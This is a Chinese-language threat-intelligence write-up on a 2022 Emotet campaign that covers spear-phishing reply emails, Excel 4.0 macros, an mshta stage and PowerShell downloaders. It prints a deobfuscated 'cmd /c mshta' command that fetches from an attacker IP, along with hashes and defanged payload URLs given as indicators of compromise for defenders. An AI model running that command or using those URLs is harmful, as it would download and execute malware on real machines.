惡意軟體Emotet 的新攻擊方法
Emotet 曾經是惡意軟體領域的霸主,經常變換攻擊模式。在 2021 年年底,研究人員就發現 Emotet 啟用了一種新的攻擊方法。
攻擊透過帶有惡意 Excel 檔案的魚叉郵件發起,Excel 文件中包含混淆的 Excel 4.0 宏。啟用宏程式碼後,樣本會下載並執行一個 HTML 應用程式,再下載後續的 PowerShell 指令碼以及 Emotet 惡意樣本。
“光輝”歷史
Emotet 最早在 2014 年被發現,此後一直保持活躍。2021 年 1 月,執法機構關停了 Emotet 在全球的基礎設施。該惡意軟體一度銷聲匿跡,但在 2021 年 11 月 Emotet 正式迴歸。
Emotet 經常使用執行緒劫持發起攻擊,據此 Emotet 可以在失陷主機的 Emotet 郵件客戶端中為正常電子郵件生成偽造回覆郵件。
Emotet 自從迴歸後使用了不同的攻擊方法。2021 年 12 月,Emotet 在惡意郵件中攜帶了下載虛假的 Adobe 應用程式安裝包的惡意連結。而在 2022 年,Emotet 轉而使用帶有惡意附件的電子郵件進行攻擊。
有時候,Emotet 使用加密的 ZIP 檔案作為附件檔案。有時候,直接將 Excel 檔案作為附件。
電子郵件
Emotet 發現了一封 2021 年 6 月的電子郵件,在 2022 年 1 月 27 日傳送了一封虛假的回覆郵件。郵件帶有加密的壓縮檔案,而密碼在郵件中提供。
電子郵件
誘餌文件
加密的壓縮檔案中包含一個帶有 Excel 4.0 宏的 Excel 檔案,並且顯著提示使用者要啟用宏。
誘餌文件
宏被啟用後,執行
cmd.exe執行
mshta.ext。利用十六進位制和字元混淆來繞過靜態檢測措施,去混淆後為
cmd /c mshta hxxp://91.240.118.168/se/s.html。
宏程式碼
HTML 檔案是高度混淆的,執行會下載額外的 PowerShell 程式碼。
混淆 HTML 應用程式
PowerShell
混淆的 PowerShell 指令碼透過
hxxp://91.240.118.168/se/s.png下載拉取 Emotet 的第二個 PowerShell 指令碼。
PowerShell 程式碼
第二個 PowerShell 指令碼中包含 14 個 URL,指令碼會嘗試每個 URL 來下載 Emotet 惡意樣本。部署多個 URL 使得攻擊基礎設施的彈性更好。
拉取流量
攻擊鏈的最後,透過 DLL 加密資源段載入 Emotet 執行。
Emotet 樣本
結論
Emotet 是一個高度活躍的家族,為了逃避檢測會經常變換打法。最新的攻擊鏈顯示,Emotet 會綜合使用多種型別的檔案和高度混淆的指令碼發起攻擊。
IOC
9f22626232934970e4851467b7b746578f0f149984cd0e4e1a156b391727fac9
6d55f25222831cce73fd9a64a8e5a63b002522dc2637bd2704f77168c7c02d88
9bda03babb0f2c6aa9861eca95b33af06a650e2851cce4edcc1fc3abd8e7c2a1
5bd4987db7e6946bf2ca3f73e17d6f75e2d8217df63b2f7763ea9a6ebcaf9fed
2de72908e0a1ef97e4e06d8b1ba3dc0d76f580cdf36f96b5c919bea770b2805f
hxxp://unifiedpharma.com/wp-content/5arxM/
hxxp://hotelamerpalace.com/Fox-C404/LEPqPJpt4Gbr8BHAn/
hxxps://connecticutsfinestmovers.com/Fox-C/mVwOqxT17gVWaE8E/
hxxp://icfacn.com/runtime/n7qA2YStudp/
hxxps://krezol-group.com:443/images/PmLGLKYeCBs5d/
hxxp://ledcaopingdeng.com/wp-includes/Qq39yj7fpvk/
hxxp://autodiscover.karlamejia.com/wp-admin/hcdnVlRIiwvTVrJjJEE/
hxxps://crmweb.info:443/bitrix/rc9XjtwF/
hxxp://accessunited-bank.com/admin/hzIgVwq8btak/
hxxp://pigij.com/wp-admin/MVW5/
hxxp://artanddesign.one/wp-content/uploads/A2cZL7/
hxxp://strawberry.kids-singer.net/assets_c/WAdvNT84Dmu/
hxxps://eleccom.shop:443/services/AEjSDj/
hxxps://izocab.com/nashi-klienty/B5SC/
參考來源
來自 “ Freebuf. ”, 原文作者:Avenger;原文連結:https://www.freebuf.com/articles/network/322712.html,如有侵權,請聯絡管理員刪除。
相關文章
- TrickBot和Emotet再奪惡意軟體之冠
- 阻止惡意軟體和網路攻擊的基本方式
- 惡意 Prompt 攻擊
- FBI提醒司機:小心針對汽車的惡意軟體攻擊
- 防止惡意攻擊,伺服器DDoS防禦軟體科普伺服器
- Osterman Research:近20%公司曾受到社交媒體惡意軟體攻擊
- 黑客利用Excel文件來執行ChainShot惡意軟體攻擊黑客ExcelAI
- 什麼是無檔案惡意軟體攻擊?如何防禦?
- 惡意軟體日均進攻百萬次!三大方法保護Hadoop叢集免遭攻擊!Hadoop
- 蘋果iOS全新惡意軟體:專門攻擊未越獄裝置蘋果iOS
- 前端 防止使用 target="_blank" 的惡意攻擊前端
- 數百家媒體機構被部署惡意軟體,美國新聞行業遭受供應鏈攻擊行業
- 英安全機構稱朝鮮應對惡意勒索軟體攻擊事件負責事件
- 惡意攻擊仍佔資料洩露的 64%
- 思科:Java成91%惡意攻擊的主要原因Java
- NoiseMe:瞄準加密貨幣交易機器人的新型惡意軟體攻擊分析報告加密機器人
- 新的破壞性惡意軟體"流星"雨刷用於伊朗鐵路襲擊
- Oracle 惡意攻擊問題分析和解決(一)Oracle
- 輕鬆搞定Windows惡意程式碼攻擊(轉)Windows
- 攻擊者使用SQLite資料庫中的惡意程式碼攻擊應用程式SQLite資料庫
- Windows Defender漏洞防護:減少針對下一代惡意軟體的攻擊面Windows
- 惡意解除安裝oracle軟體恢復方法Oracle
- Android 更新伺服器遭黑客攻擊 ,德產手機被安裝惡意軟體Android伺服器黑客
- 分佈超過800個惡意NPM包 軟體供應鏈攻擊活動增長迅速NPM
- 如何防止伺服器被惡意網路攻擊?伺服器
- 如何預防工業物聯網中的惡意攻擊?
- EvilAbigail-自動化Linux的惡意攻擊AILinux
- Zero Access惡意軟體分析
- BlackBerry《季度全球威脅情報報告》顯示新型惡意軟體攻擊活動激增 70%
- 最新惡意軟體來襲!專攻Windows盜版使用者Windows
- 惡意軟體的脫殼方法(二):弱加密演算法加密演算法
- 科幻:Windows核心攻擊是指標對Windows作業系統核心的惡意攻擊行為Windows指標作業系統
- 新惡意軟體模糊技術是如何利用HTML5的?HTML
- 分散式的節點能有效地防止惡意攻擊事件分散式事件
- 思否社群正在遭受持續的大規模惡意攻擊
- linux ddos惡意軟體分析Linux
- 惡意軟體Linux/Mumblehard分析Linux
- 【活在中國】誰是惡意軟體?